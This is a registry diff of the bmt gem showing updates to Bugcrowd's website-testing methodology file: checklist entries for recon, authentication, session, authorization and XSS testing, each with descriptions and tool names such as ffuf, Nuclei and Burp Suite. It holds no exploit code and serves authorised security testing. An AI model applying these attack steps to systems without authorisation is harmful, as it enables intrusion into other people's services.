bmt 0.6.0 → 0.7.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (7) hide show
  1. checksums.yaml +4 -4
  2. data/lib/bmt/version.rb +1 -1
  3. data/lib/data/0.1/methodologies/active_directory.json +426 -0
  4. data/lib/data/0.1/methodologies/internal_network.json +454 -0
  5. data/lib/data/0.1/methodologies/website_testing.json +398 -206
  6. data/lib/data/0.1/schema.json +4 -4
  7. metadata +5 -3
data/lib/data/0.1/methodologies/website_testing.json CHANGED
@@ -1,9 +1,9 @@
1
1
  {
2
2
  "metadata": {
3
3
  "title": "Website Testing",
4
- "release_date": "2021-05-31T00:00:00+00:00",
5
- "description": "Bugcrowd web methodology testing",
6
- "vrt_version": "10.0.1"
4
+ "release_date": "2025-04-24T00:00:00+00:00",
5
+ "description": "Bugcrowd Web Methodology Testing",
6
+ "vrt_version": "1.16"
7
7
  },
8
8
  "content": {
9
9
  "steps": [
@@ -17,74 +17,74 @@
17
17
  "key": "search_engine_discovery_and_reconnaissance",
18
18
  "title": "Conduct Search Engine Discovery and Reconnaissance for Information Leakage",
19
19
  "caption": "OTG-INFO-001, WAHHM - Recon and Analysis",
20
- "description": "Use a search engine to search for Network diagrams and Configurations, Credentials, Error message content.",
21
- "tools": "Google Hacking, Sitedigger, Shodan, FOCA, Punkspider",
20
+ "description": "Query search engines for leaked credentials, configurations, or documents via misindexing.",
21
+ "tools": "bbot, dorky, Censys, Google Dorks, Shodan",
22
22
  "vrt_category": "sensitive_data_exposure"
23
23
  },
24
24
  {
25
25
  "key": "fingerprint",
26
26
  "title": "Fingerprint Web Server",
27
27
  "caption": "OTG-INFO-002, WAHHM - Recon and Analysis",
28
- "description": "Find the version and type of a running web server to determine known vulnerabilities and the appropriate exploits. Using 'HTTP header field ordering' and 'Malformed requests test.'",
29
- "tools": "Httprint, Httprecon, Desenmascarame",
28
+ "description": "Identify server, CMS, or database software and version to exploit CVEs or misconfigurations.",
29
+ "tools": "httpx, Nuclei, Wappalyzer",
30
30
  "vrt_category": "server_security_misconfiguration"
31
31
  },
32
32
  {
33
33
  "key": "webserver_metafiles",
34
34
  "title": "Review Webserver Metafiles for Information Leakage",
35
35
  "caption": "OTG-INFO-003, WAHHM - Recon and Analysis",
36
- "description": "Analyze robots.txt and identify <META> Tags from website.",
36
+ "description": "Check robots.txt, sitemap.xml and identify <META> Tags from website for exposed endpoints or directories.",
37
37
  "tools": "Browser, curl, wget"
38
38
  },
39
39
  {
40
40
  "key": "enumerate_applications",
41
41
  "title": "Enumerate Applications on Webserver",
42
42
  "caption": "if in scope OTG-INFO-004, WAHHM - Recon and Analysis",
43
- "description": "Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers",
44
- "tools": "Webhosting.info, dnsrecon, Nmap, fierce, Recon-ng, Intrigue"
43
+ "description": "Find applications hosted in the webserver (Virtual hosts/Subdomain), non-standard ports, DNS zone transfers to expand the attack surface.",
44
+ "tools": "Amass, bbot, ffuf, gowitness, Subfinder"
45
45
  },
46
46
  {
47
47
  "key": "webpage_comments_and_metadata",
48
48
  "title": "Review Webpage Comments and Metadata for Information Leakage",
49
49
  "caption": "OTG-INFO-005, WAHHM - Recon and Analysis",
50
- "description": "Find sensitive information from webpage comments and Metadata on source code.",
51
- "tools": "Browser, curl, wget",
50
+ "description": "Analyze HTML and JavaScript for leaked API keys, credentials, or endpoints.",
51
+ "tools": "Browser, GitDorker, LinkFinder, TruffleHog",
52
52
  "vrt_category": "sensitive_data_exposure"
53
53
  },
54
54
  {
55
55
  "key": "application_entry_points",
56
56
  "title": "Identify application entry points",
57
57
  "caption": "OTG-INFO-006, WAHHM - Recon and Analysis",
58
- "description": "Identify from hidden fields, parameters, methods HTTP header analysis",
59
- "tools": "Burp proxy, ZAP, Tamper data"
58
+ "description": "Identify forms, APIs, or parameters for injection or logic vulnerabilities.",
59
+ "tools": "Arjun, Burp Suite (Param-miner), kiterunner"
60
60
  },
61
61
  {
62
62
  "key": "execution_paths",
63
63
  "title": "Map execution paths through application",
64
64
  "caption": "OTG-INFO-007, WAHHM - Recon and Analysis",
65
- "description": "Map the target application and understand the principal workflows.",
66
- "tools": "Burp proxy, ZAP"
65
+ "description": "Map application workflows to uncover hidden or unprotected routes.",
66
+ "tools": "Burp Suite, ffuf, Interlace, nuclei"
67
67
  },
68
68
  {
69
69
  "key": "fingerprint_webapp_framework",
70
70
  "title": "Fingerprint Web Application Framework",
71
71
  "caption": "OTG-INFO-008, WAHHM - Recon and Analysis",
72
- "description": "Find the type of web application framework/CMS from HTTP headers, Cookies, Source code, Specific files and folders.",
73
- "tools": "Whatweb, BlindElephant, Wappalyzer"
72
+ "description": "Identify the web application framework or CMS by examining HTTP headers, cookies, source code, and specific file/folder structures for characteristic indicators.",
73
+ "tools": "BuiltWith, Burp Suite, httpx, Wappalyzer"
74
74
  },
75
75
  {
76
76
  "key": "fingerprint_webapp",
77
77
  "title": "Fingerprint Web Application",
78
78
  "caption": "OTG-INFO-009, WAHHM - Recon and Analysis",
79
79
  "description": "Identify the web application and version to determine known vulnerabilities and the appropriate exploits.",
80
- "tools": "Whatweb, BlindElephant, Wappalyzer"
80
+ "tools": "Nuclei, httpx, Wappalyzer"
81
81
  },
82
82
  {
83
83
  "key": "application_architecture",
84
84
  "title": "Map Application Architecture",
85
85
  "caption": "OTG-INFO-010, WAHHM - Recon and Analysis",
86
86
  "description": "Identify application architecture including Web language, WAF, Reverse proxy, Application Server, Backend Database",
87
- "tools": "Browser, curl, wget"
87
+ "tools": "Censys, httpx, Shodan, wafw00f, Wappalyzer"
88
88
  }
89
89
  ]
90
90
  },
@@ -98,63 +98,103 @@
98
98
  "key": "network_and_infrastructure",
99
99
  "title": "Test Network/Infrastructure Configuration",
100
100
  "caption": "OTG-CONFIG-001, WAHHM - Recon and Analysis, Assess Application Hosting",
101
- "description": "Understand the infrastructure elements interactions, config management for software, backend DB server, WebDAV, FTP in order to identify known vulnerabilities.",
102
- "tools": "Nessus",
101
+ "description": "Assess infrastructure interactions and configuration management for software, backend DB servers, WebDAV, and FTP to uncover known vulnerabilities.",
102
+ "tools": "naabu, Nessus, Nmap, RustScan",
103
103
  "vrt_category": "server_security_misconfiguration"
104
104
  },
105
105
  {
106
106
  "key": "application_platform",
107
107
  "title": "Test Application Platform Configuration",
108
108
  "caption": "OTG-CONFIG-002, WAHHM - Recon and Analysis",
109
- "description": "Identify default installation file/directory, Handle Server errors (40*,50*), Minimal Privilege, Software logging.",
110
- "tools": "Browser, Nikto",
109
+ "description": "Testing application platform configuration involves identifying default installation paths, handling server errors, enforcing minimal privileges, and managing software logging.",
110
+ "tools": "Browser, ffuf, Nuclei",
111
111
  "vrt_category": "server_security_misconfiguration"
112
112
  },
113
113
  {
114
114
  "key": "file_extensions_handling",
115
115
  "title": "Test File Extensions Handling for Sensitive Information",
116
116
  "caption": "OTG-CONFIG-003, WAHHM - Recon and Analysis",
117
- "description": "Find important file, information (.asa , .inc , .sql ,zip, tar, pdf, txt, etc)",
118
- "tools": "Browser, Nikto",
117
+ "description": "Locate crucial files and information with the following extensions: .asa, .inc, .sql, .zip, .tar, .pdf, .txt, and others.",
118
+ "tools": "Browser, ffuf",
119
119
  "vrt_category": "sensitive_data_exposure"
120
120
  },
121
121
  {
122
122
  "key": "backup_and_unreferenced_files",
123
123
  "title": "Backup and Unreferenced Files for Sensitive Information",
124
124
  "caption": "OTG-CONFIG-004, WAHHM - Recon and Analysis",
125
- "description": "Check JS source code, comments, cache file, backup file (.old, .bak, .inc, .src) and guessing of filename",
126
- "tools": "Nessus, Nikto, Wikto",
125
+ "description": "Examine JavaScript code, comments, cache, and backup files (.old, .bak, .inc, .src). Utilize filename guessing to discover additional files.",
126
+ "tools": "Browser, ffuf, gau, LinkFinder",
127
127
  "vrt_category": "sensitive_data_exposure"
128
128
  },
129
129
  {
130
130
  "key": "admin_interfaces",
131
131
  "title": "Enumerate Infrastructure and Application Admin Interfaces",
132
132
  "caption": "OTG-CONFIG-005, WAHHM - Recon and Analysis",
133
- "description": "Directory and file enumeration, comments and links in source (/admin, /administrator, /backoffice, /backend, etc), alternative server port (Tomcat/8080)",
134
- "tools": "Burp Proxy, dirb, Dirbuster, fuzzdb, Tilde Scanner"
133
+ "description": "Perform directory and file enumeration. Extract comments and links from source code, specifically looking for administrative interfaces (e.g., /admin, /administrator, /backoffice, /backend). Investigate alternative server ports, such as Tomcat running on port 8080.",
134
+ "tools": "Burp Suite, ffuf, gau, kiterunner, LinkFinder"
135
135
  },
136
136
  {
137
137
  "key": "http_methods",
138
138
  "title": "Test HTTP Methods",
139
139
  "caption": "OTG-CONFIG-006, WAHHM - Test Handling of Access",
140
- "description": "Identify HTTP allowed methods on Web server with OPTIONS. Arbitrary HTTP Methods, HEAD access control bypass and XST",
141
- "tools": "netcat, curl",
140
+ "description": "Probe risky HTTP methods (e.g., OPTIONS, TRACE, PUT) for unauthorized access.",
141
+ "tools": "Burp Suite, curl, ffuf",
142
142
  "vrt_category": "server_security_misconfiguration"
143
143
  },
144
144
  {
145
145
  "key": "http_transport_security",
146
146
  "title": "Test HTTP Strict Transport Security",
147
147
  "caption": "OTG-CONFIG-007, WAHHM - Test Handling of Access",
148
- "description": "Identify HSTS header on Web server through HTTP response header. curl -s -D- https://domain.com/ | grep Strict",
149
- "tools": "Burp Proxy, ZAP, curl",
148
+ "description": "Check the HTTP response headers from the web server to identify the presence and details of the Strict-Transport-Security (HSTS) header.",
149
+ "tools": "Browser, Burp Suite, curl",
150
150
  "vrt_category": "server_security_misconfiguration"
151
151
  },
152
152
  {
153
153
  "key": "ria_cross_domain_policy",
154
154
  "title": "Test RIA cross domain policy",
155
155
  "caption": "OTG-CONFIG-008, WAHHM - Test Handling of Access",
156
- "description": "Analyse the permissions allowed from the policy files (crossdomain.xml/clientaccesspolicy.xml) and allow-access-from.",
157
- "tools": "Burp Proxy, ZAP, Nikto",
156
+ "description": "Test crossdomain.xml and clientaccesspolicy.xml for permissive data access.",
157
+ "tools": "Burp Suite, curl, wget",
158
+ "vrt_category": "server_security_misconfiguration"
159
+ },
160
+ {
161
+ "key": "test_for_subdomain_takeover",
162
+ "title": "Test for Subdomain Takeover",
163
+ "caption": "OTG-CONFIG-010",
164
+ "description": "Exploit dangling DNS records for subdomain takeover.",
165
+ "tools": "Amass, bbot, dig, gowitness, subfinder",
166
+ "vrt_category": "server_security_misconfiguration"
167
+ },
168
+ {
169
+ "key": "test_cloud_storage",
170
+ "title": "Test Cloud Storage",
171
+ "caption": "OTG-CONFIG-011",
172
+ "description": "Check AWS S3 buckets, GCP Cloud Storage, and Azure Blob Storage for public data exposure.",
173
+ "tools": "awscli, Azure CLI, CloudFox, GCPBucketBrute, s3recon",
174
+ "vrt_category": "server_security_misconfiguration"
175
+ },
176
+ {
177
+ "key": "web_cache_deception",
178
+ "title": "Web Cache Deception",
179
+ "caption": "",
180
+ "description": "Cache sensitive pages as public resources via path manipulation.",
181
+ "tools": "Browser, Burp Suite (Param-miner), curl",
182
+ "vrt_category": "server_security_misconfiguration"
183
+ },
184
+ {
185
+ "key": "web_cache_poisoning",
186
+ "title": "Web Cache Poisoning",
187
+ "caption": "",
188
+ "description": "Poison CDN or service worker cache with malicious content.",
189
+ "tools": "Browser, Burp Suite (Param-miner), curl",
190
+ "vrt_category": "server_security_misconfiguration"
191
+ },
192
+ {
193
+ "key": "content_security_policy",
194
+ "title": "Testing Content Security Policy (CSP)",
195
+ "caption": "",
196
+ "description": "Assess the implementation of the Content Security Policy to ensure it effectively mitigates risks of cross-site scripting (XSS) and data injection attacks.",
197
+ "tools": "Burp Suite, CSP Evaluator, ZAP",
158
198
  "vrt_category": "server_security_misconfiguration"
159
199
  }
160
200
  ]
@@ -170,7 +210,7 @@
170
210
  "title": "Test Role Definitions",
171
211
  "caption": "OTG-IDENT-001, WAHHM - Test Handling of Access",
172
212
  "description": "Validate the system roles defined within the application by creating a permission matrix.",
173
- "tools": "Burp Proxy, ZAP",
213
+ "tools": "Browser, Burp Suite, ZAP",
174
214
  "vrt_category": "broken_access_control"
175
215
  },
176
216
  {
@@ -178,46 +218,46 @@
178
218
  "title": "Test User Registration Process",
179
219
  "caption": "OTG-IDENT-002, WAHHM - Test Handling of Access",
180
220
  "description": "Verify that the identity requirements for user registration are aligned with business and security requirements",
181
- "tools": "Burp Proxy, ZAP",
221
+ "tools": "Browser, Burp Suite, ZAP",
182
222
  "vrt_category": "server_security_misconfiguration"
183
223
  },
184
224
  {
185
225
  "key": "account_provisioning",
186
226
  "title": "Test Account Provisioning Process",
187
227
  "caption": "OTG-IDENT-003, WAHHM - Test Handling of Access",
188
- "description": "Determine which roles are able to provision users and what sort of accounts they can provision.",
189
- "tools": "Burp Proxy, ZAP"
228
+ "description": "Identify the roles with user provisioning capabilities and the permissible scope of the accounts they can provision.",
229
+ "tools": "Browser, Burp Suite, ZAP"
190
230
  },
191
231
  {
192
232
  "key": "guessable_user_accounts",
193
233
  "title": "Testing for Account Enumeration and Guessable User Account",
194
234
  "caption": "OTG-IDENT-004, WAHHM - Test Handling of Access",
195
- "description": "Generic login error statement check, return codes/parameter values, enumerate all possible valid user ids (Login system, Forgot password)",
196
- "tools": "Browser, Burp Proxy, ZAP",
235
+ "description": "Check login and forgot password mechanisms for generic error leakage and return code vulnerabilities, and attempt to enumerate valid users through direct methods or timing exploits.",
236
+ "tools": "Browser, Burp Suite, ZAP",
197
237
  "vrt_category": "server_security_misconfiguration"
198
238
  },
199
239
  {
200
240
  "key": "username_policy",
201
241
  "title": "Testing for Weak or unenforced username policy",
202
242
  "caption": "OTG-IDENT-005, WAHHM - Test Handling of Access",
203
- "description": "User account names are often highly structured (e.g. Joe Bloggs account name is jbloggs and Fred Nurks account name is fnurks) and valid account names can easily be guessed.",
204
- "tools": "Browser, Burp Proxy, ZAP",
243
+ "description": "User account naming conventions often follow predictable patterns (e.g., initials and last name), making valid account names easily guessable.",
244
+ "tools": "Browser, Burp Suite, ZAP",
205
245
  "vrt_category": "server_security_misconfiguration"
206
246
  },
207
247
  {
208
248
  "key": "guest_accounts_permission",
209
249
  "title": "Test Permissions of Guest/Training Accounts",
210
250
  "caption": "OTG-IDENT-006, WAHHM - Test Handling of Access",
211
- "description": "Guest and Training accounts are useful ways to acquaint potential users with system functionality prior to them completing the authorization process required for access. Evaluate consistency between access policy and guest/training account access permissions.",
212
- "tools": "Burp Proxy, ZAP",
251
+ "description": "Evaluate if guest and training account access permissions consistently align with the defined access policy.",
252
+ "tools": "Browser, Burp Suite, ZAP",
213
253
  "vrt_category": "server_security_misconfiguration"
214
254
  },
215
255
  {
216
256
  "key": "account_suspension_resumption",
217
257
  "title": "Test Account Suspension/Resumption Process",
218
258
  "caption": "OTG-IDENT-007, WAHHM - Test Handling of Access",
219
- "description": "Verify the identity requirements for user registration align with business/security requirements. Validate the registration process.",
220
- "tools": "Burp Proxy, ZAP",
259
+ "description": "Verify the alignment of user registration identity requirements with business and security needs, and subsequently validate the entire registration process.",
260
+ "tools": "Browser, Burp Suite, ZAP",
221
261
  "vrt_category": "server_security_misconfiguration"
222
262
  }
223
263
  ]
@@ -233,23 +273,23 @@
233
273
  "title": "Testing for Credentials Transported over an Encrypted Channel",
234
274
  "caption": "OTG-AUTHN-001, WAHHM - Miscellaneous Tests",
235
275
  "description": "Check the referrer whether it’s HTTP or HTTPs. Sending data through HTTP and HTTPS.",
236
- "tools": "Burp Proxy, ZAP",
276
+ "tools": "Burp Suite, ZAP",
237
277
  "vrt_category": "broken_authentication_and_session_management"
238
278
  },
239
279
  {
240
280
  "key": "default_credentials",
241
281
  "title": "Testing for default credentials",
242
282
  "caption": "OTG-AUTHN-002, WAHHM - Test Handling of Access",
243
- "description": "Testing for default credentials of common applications, Testing for default password of new accounts.",
244
- "tools": "Burp Proxy, ZAP, Hydra",
283
+ "description": "Test for default credentials in common applications and default passwords assigned to new accounts.",
284
+ "tools": "Browser, Burp Suite, ZAP, Hydra",
245
285
  "vrt_category": "server_security_misconfiguration"
246
286
  },
247
287
  {
248
288
  "key": "lock_out_mechanism",
249
- "title": "Testing for Weak lock out mechanism",
289
+ "title": "Testing for Weak Lockout Mechanism",
250
290
  "caption": "OTG-AUTHN-003, WAHHM - Test Handling of Access",
251
- "description": "Evaluate the account lockout mechanism’s ability to mitigate brute force password guessing. Evaluate the unlock mechanism’s resistance to unauthorized account unlocking.",
252
- "tools": "Browser",
291
+ "description": "Evaluate the strength of the account lockout against password guessing and the security of the account unlock process.",
292
+ "tools": "Browser, Burp Suite, ZAP, Hydra",
253
293
  "vrt_category": "server_security_misconfiguration"
254
294
  },
255
295
  {
@@ -257,47 +297,47 @@
257
297
  "title": "Testing for bypassing authentication schema",
258
298
  "caption": "OTG-AUTHN-004, WAHHM - Test Handling of Access",
259
299
  "description": "Force browsing (/admin/main.php, /page.asp?authenticated=yes), Parameter Modification, Session ID prediction, SQL Injection",
260
- "tools": "Burp Proxy, ZAP",
300
+ "tools": "Arjun, Browser, Burp Suite, kiterunner, Param-miner, ZAP",
261
301
  "vrt_category": "broken_authentication_and_session_management"
262
302
  },
263
303
  {
264
304
  "key": "remember_password",
265
305
  "title": "Test remember password functionality",
266
306
  "caption": "OTG-AUTHN-005, WAHHM - Test Handling of Access",
267
- "description": "Look for passwords being stored in a cookie. Examine the cookies stored by the application. Verify that the credentials are not stored in clear text, but are hashed. Autocompleted=off?",
268
- "tools": "Burp Proxy, ZAP",
307
+ "description": "Check application cookies for password storage (ensuring they are not in plaintext but hashed) and verify the autocomplete=off attribute on password fields.",
308
+ "tools": "Browser, Burp Suite, ZAP",
269
309
  "vrt_category": "broken_authentication_and_session_management"
270
310
  },
271
311
  {
272
312
  "key": "browser_cache",
273
313
  "title": "Testing for Browser cache weakness",
274
314
  "caption": "OTG-AUTHN-006, WAHHM - Miscellaneous Tests",
275
- "description": "Check browser history issues by clicking the 'Back' button after logging out. Check browser cache issue from HTTP response headers (Cache-Control: no-cache)",
276
- "tools": "Burp Proxy, ZAP, Firefox add-on CacheViewer2",
315
+ "description": "Test for browser history vulnerabilities after logout and examine HTTP response headers for proper cache control directives (e.g., Cache-Control: no-cache)",
316
+ "tools": "Browser, Burp Suite, ZAP, Firefox add-on CacheViewer2",
277
317
  "vrt_category": "server_security_misconfiguration"
278
318
  },
279
319
  {
280
320
  "key": "password_policy",
281
321
  "title": "Testing for Weak password policy",
282
322
  "caption": "OTG-AUTHN-007, WAHHM - Test Handling of Access",
283
- "description": "Determine the resistance of the application against brute force password guessing using available password dictionaries by evaluating the length, complexity, reuse and aging requirements of Passwords.",
284
- "tools": "Burp Proxy, ZAP, Hydra",
323
+ "description": "Assess the application's resistance to dictionary-based brute-force attacks by evaluating password length, complexity, reuse restrictions, and aging requirements.",
324
+ "tools": "Browser, Burp Suite, ZAP, Hydra",
285
325
  "vrt_category": "insufficient_security_configurability"
286
326
  },
287
327
  {
288
328
  "key": "security_question",
289
329
  "title": "Testing for Weak security question/answer",
290
330
  "caption": "OTG-AUTHN-008, WAHHM - Test Handling of Access",
291
- "description": "Testing for weak pre-generated questions, Testing for weak self-generated questions, Testing for brute-forcible answers (Unlimited attempts?)",
292
- "tools": "Browser",
331
+ "description": "Test password reset questions for inherent weakness (pre-generated, self-generated) and susceptibility to brute-force attacks due to unlimited attempts.",
332
+ "tools": "Browser, Burp Suite, ZAP",
293
333
  "vrt_category": "broken_authentication_and_session_management"
294
334
  },
295
335
  {
296
336
  "key": "change_password",
297
337
  "title": "Testing for weak password change or reset functionalities",
298
338
  "caption": "OTG-AUTHN-009, WAHHM - Test Handling of Access",
299
- "description": "Test password reset (Display old password in plain-text?, Send via email?, Random token on confirmation email ?), Test password change (Need old password?), CSRF vulnerability ?",
300
- "tools": "Browser, Burp Proxy, ZAP",
339
+ "description": "Test password reset for plaintext password display, insecure email transmission, and missing random tokens, and assess password change for old password requirement and CSRF vulnerability.",
340
+ "tools": "Browser, Burp Suite, ZAP",
301
341
  "vrt_category": "broken_authentication_and_session_management"
302
342
  },
303
343
  {
@@ -305,7 +345,35 @@
305
345
  "title": "Testing for Weaker authentication in alternative channel",
306
346
  "caption": "OTG-AUTHN-010, WAHHM - Test Handling of Access",
307
347
  "description": "Understand the primary mechanism and Identify other channels (Mobile App, Call center, SSO)",
308
- "tools": "Browser"
348
+ "tools": "Browser, Burp Suite, ZAP"
349
+ },
350
+ {
351
+ "key": "single_sign_on_misconfigurations",
352
+ "title": "Single Sign-On Misconfigurations",
353
+ "caption": "",
354
+ "description": "Exploit OAuth or OpenID Connect flaws (e.g., redirect URI tampering)",
355
+ "tools": "Browser, Burp Suite, ZAP"
356
+ },
357
+ {
358
+ "key": "testing_for_mfa",
359
+ "title": "Testing for 2FA/MFA",
360
+ "caption": "",
361
+ "description": "Attempt to bypass the implemented two-factor authentication to identify potential weaknesses.",
362
+ "tools": "Browser, Burp Suite, ZAP"
363
+ },
364
+ {
365
+ "key": "testing_for_password_reset_token",
366
+ "title": "Testing for Password Reset Token Exposure to Third-Party Domains",
367
+ "caption": "",
368
+ "description": "Check if password reset tokens are exposed to third-party domains via referrer headers or other methods.",
369
+ "tools": "Browser, Burp Suite, ZAP"
370
+ },
371
+ {
372
+ "key": "testing_for_reusable_password_reset_token",
373
+ "title": "Testing for Reusable Password Reset Tokens",
374
+ "caption": "",
375
+ "description": "Determine if password reset tokens can be used multiple times.",
376
+ "tools": "Browser, Burp Suite, ZAP"
309
377
  }
310
378
  ]
311
379
  },
@@ -319,32 +387,32 @@
319
387
  "key": "directory_traversal_and_file_include",
320
388
  "title": "Testing Directory traversal/file include",
321
389
  "caption": "OTG-AUTHZ-001, WAHHM - Test Handling of Input",
322
- "description": "dot-dot-slash attack (../), Directory traversal, Local File inclusion/Remote File Inclusion.",
323
- "tools": "Burp Proxy, ZAP, Wfuzz",
390
+ "description": "Test for Dot-Dot-Slash (../), Directory Traversal, Local File Inclusion (LFI), and Remote File Inclusion (RFI) vulnerabilities.",
391
+ "tools": "Arjun, Burp Suite, ffuf, Param-miner, Wfuzz, ZAP",
324
392
  "vrt_category": "server_side_injection"
325
393
  },
326
394
  {
327
395
  "key": "bypass_schema",
328
396
  "title": "Testing for bypassing authorization schema",
329
397
  "caption": "OTG-AUTHZ-002, WAHHM - Test Handling of Access",
330
- "description": "Access a resource without authentication?, Bypass ACL, Force browsing (/admin/adduser.jsp)",
331
- "tools": "Burp Proxy (Authorize), ZAP",
398
+ "description": "Test for the ability to access resources without authentication, bypass Access Control Lists (ACLs), and perform forceful browsing to restricted areas (e.g., /admin/adduser.jsp)",
399
+ "tools": "Burp Suite (Authorize), ZAP",
332
400
  "vrt_category": "broken_access_control"
333
401
  },
334
402
  {
335
403
  "key": "privilege_escalation",
336
404
  "title": "Testing for Privilege Escalation",
337
405
  "caption": "OTG-AUTHZ-003, WAHHM - Test Handling of Access",
338
- "description": "Testing for role/privilege manipulates the values of hidden variables. Change some param groupid=2 to groupid=1",
339
- "tools": "Burp Proxy (Authorize), ZAP",
406
+ "description": "Escalate privileges via parameter tampering or logic flaws.",
407
+ "tools": "Burp Suite (Authorize), ZAP",
340
408
  "vrt_category": "broken_authentication_and_session_management"
341
409
  },
342
410
  {
343
411
  "key": "direct_object_reference",
344
412
  "title": "Testing for Insecure Direct Object References",
345
413
  "caption": "OTG-AUTHZ-004, WAHHM - Test Handling of Access",
346
- "description": "Force changing parameter value (?invoice=123 -> ?invoice=456)",
347
- "tools": "Burp Proxy (Authorize), ZAP",
414
+ "description": "Access objects by manipulating identifiers (e.g., user IDs)",
415
+ "tools": "Burp Suite (Authorize), ZAP",
348
416
  "vrt_category": "broken_access_control"
349
417
  }
350
418
  ]
@@ -359,8 +427,8 @@
359
427
  "key": "bypass_schema",
360
428
  "title": "Testing for Bypassing Session Management Schema",
361
429
  "caption": "OTG-SESS-001, WAHHM - Test Handling of Access",
362
- "description": "SessionID analysis prediction, unencrypted cookie transport, brute-force.",
363
- "tools": "Burp Proxy, ForceSSL, ZAP, CookieDigger",
430
+ "description": "Predictable SessionIDs transmitted without encryption expose a vulnerability to interception and potential brute-force attacks, leading to authentication bypass.",
431
+ "tools": "Browser, Burp Suite, ZAP",
364
432
  "vrt_category": "broken_authentication_and_session_management"
365
433
  },
366
434
  {
@@ -368,7 +436,7 @@
368
436
  "title": "Testing for Cookies attributes",
369
437
  "caption": "OTG-SESS-002, WAHHM - Test Handling of Access",
370
438
  "description": "Check HTTPOnly and Secure flag expiration, inspect for sensitive data.",
371
- "tools": "Burp Proxy, ZAP",
439
+ "tools": "Browser, Burp Suite, ZAP",
372
440
  "vrt_category": "server_security_misconfiguration"
373
441
  },
374
442
  {
@@ -376,31 +444,31 @@
376
444
  "title": "Testing for Session Fixation",
377
445
  "caption": "OTG-SESS-003, WAHHM - Test Handling of Access",
378
446
  "description": "The application doesn't renew the cookie after a successful user authentication.",
379
- "tools": "Burp Proxy, ZAP",
447
+ "tools": "Burp Suite, ZAP",
380
448
  "vrt_category": "broken_authentication_and_session_management"
381
449
  },
382
450
  {
383
451
  "key": "exposed_variables",
384
452
  "title": "Testing for Exposed Session Variables",
385
453
  "caption": "OTG-SESS-004, WAHHM - Test Handling of Access",
386
- "description": "Encryption & Reuse of session Tokens vulnerabilities, Send sessionID with GET method ?",
387
- "tools": "Burp Proxy, ZAP",
454
+ "description": "Unencrypted and reused session tokens sent via GET requests expose sessions to easy interception and hijacking.",
455
+ "tools": "Burp Suite, ZAP",
388
456
  "vrt_category": "broken_authentication_and_session_management"
389
457
  },
390
458
  {
391
459
  "key": "csrf",
392
460
  "title": "Testing for Cross Site Request Forgery",
393
461
  "caption": "OTG-SESS-005, WAHHM - Test Handling of Access",
394
- "description": "URL analysis, Direct access to functions without any token.",
395
- "tools": "Burp Proxy (csrf_token_detect), burpy, ZAP",
462
+ "description": "Predictable URLs combined with missing CSRF tokens allow attackers to directly trigger actions on behalf of logged-in users.",
463
+ "tools": "Burp Suite, ZAP",
396
464
  "vrt_category": "cross_site_request_forgery_csrf"
397
465
  },
398
466
  {
399
467
  "key": "logout",
400
468
  "title": "Testing for logout functionality",
401
469
  "caption": "OTG-SESS-006, WAHHM - Test Handling of Access",
402
- "description": "Check reuse session after logout both server-side and SSO.",
403
- "tools": "Burp Proxy, ZAP",
470
+ "description": "Verify session invalidation server-side and across SSO after logout to prevent reuse.",
471
+ "tools": "Burp Suite, ZAP",
404
472
  "vrt_category": "broken_authentication_and_session_management"
405
473
  },
406
474
  {
@@ -408,16 +476,40 @@
408
476
  "title": "Test Session Timeout",
409
477
  "caption": "OTG-SESS-007, WAHHM - Test Handling of Access",
410
478
  "description": "Check session timeout, after the timeout has passed, all session tokens should be destroyed or be unusable.",
411
- "tools": "Burp Proxy, ZAP",
479
+ "tools": "Burp Suite, ZAP",
412
480
  "vrt_category": "broken_authentication_and_session_management"
413
481
  },
414
482
  {
415
483
  "key": "puzzling",
416
484
  "title": "Testing for Session puzzling",
417
485
  "caption": "OTG-SESS-008, WAHHM - Test Handling of Access",
418
- "description": "The application uses the same session variable for more than one purpose. An attacker can potentially access pages in an order unanticipated by the developers so that the session variable is set in one context and then used in another.",
486
+ "description": "Reusing session variables for multiple purposes allows attackers to manipulate application flow by accessing pages in unintended sequences.",
419
487
  "tools": "Burp Proxy, ZAP",
420
488
  "vrt_category": "broken_authentication_and_session_management"
489
+ },
490
+ {
491
+ "key": "concurrent",
492
+ "title": "Test for Concurrent Sessions",
493
+ "caption": "",
494
+ "description": "Check how the application manages multiple active sessions for the same account. Ensure it prevents risks like session hijacking and improper session handling.",
495
+ "tools": "Browser, Burp Suite, ZAP",
496
+ "vrt_category": "broken_authentication_and_session_management"
497
+ },
498
+ {
499
+ "key": "permission",
500
+ "title": "Test for Session Validity After Permission Change",
501
+ "caption": "",
502
+ "description": "Check if sessions remain valid when user permissions are changed.",
503
+ "tools": "Browser, Burp Suite, ZAP",
504
+ "vrt_category": "broken_authentication_and_session_management"
505
+ },
506
+ {
507
+ "key": "json_web_token",
508
+ "title": "JSON Web Token (JWT) Attacks",
509
+ "caption": "",
510
+ "description": "Check the security of JWTs by ensuring strong signing algorithms, preventing tampering, and protecting sensitive data. Verify secure transmission, token expiration, and revocation practices.",
511
+ "tools": "Burp Suite, jwt_tool, jwtXploiter, ZAP",
512
+ "vrt_category": "broken_authentication_and_session_management"
421
513
  }
422
514
  ]
423
515
  },
@@ -431,61 +523,61 @@
431
523
  "key": "reflected_xss",
432
524
  "title": "Testing for Reflected Cross Site Scripting",
433
525
  "caption": "OTG-INPVAL-001, WAHHM - Test Handling of Input",
434
- "description": "Check for input validation, Replace the vector used to identify XSS, XSS with HTTP Parameter Pollution.",
435
- "tools": "Burp Proxy, ZAP, Xenotix XSS"
526
+ "description": "Bypass input validation and leverage HTTP Parameter Pollution to inject XSS payloads, circumventing standard XSS detection vectors.",
527
+ "tools": "Arjun, Burp Suite (Param-miner), ZAP"
436
528
  },
437
529
  {
438
530
  "key": "stored_xss",
439
531
  "title": "Testing for Stored Cross Site Scripting",
440
532
  "caption": "OTG-INPVAL-002, WAHHM - Test Handling of Input",
441
- "description": "Check input forms/Upload forms and analyze HTML codes, Leverage XSS with BeEF",
442
- "tools": "Burp Proxy, ZAP, BeEF, XSS Proxy",
533
+ "description": "Identify and exploit persistent cross-site scripting vectors within input handling and HTML rendering to achieve arbitrary JavaScript execution across multiple authenticated user contexts.",
534
+ "tools": "Burp Suite, XSSer, ZAP",
443
535
  "vrt_category": "cross_site_scripting_xss"
444
536
  },
445
537
  {
446
538
  "key": "http_verb_tampering",
447
539
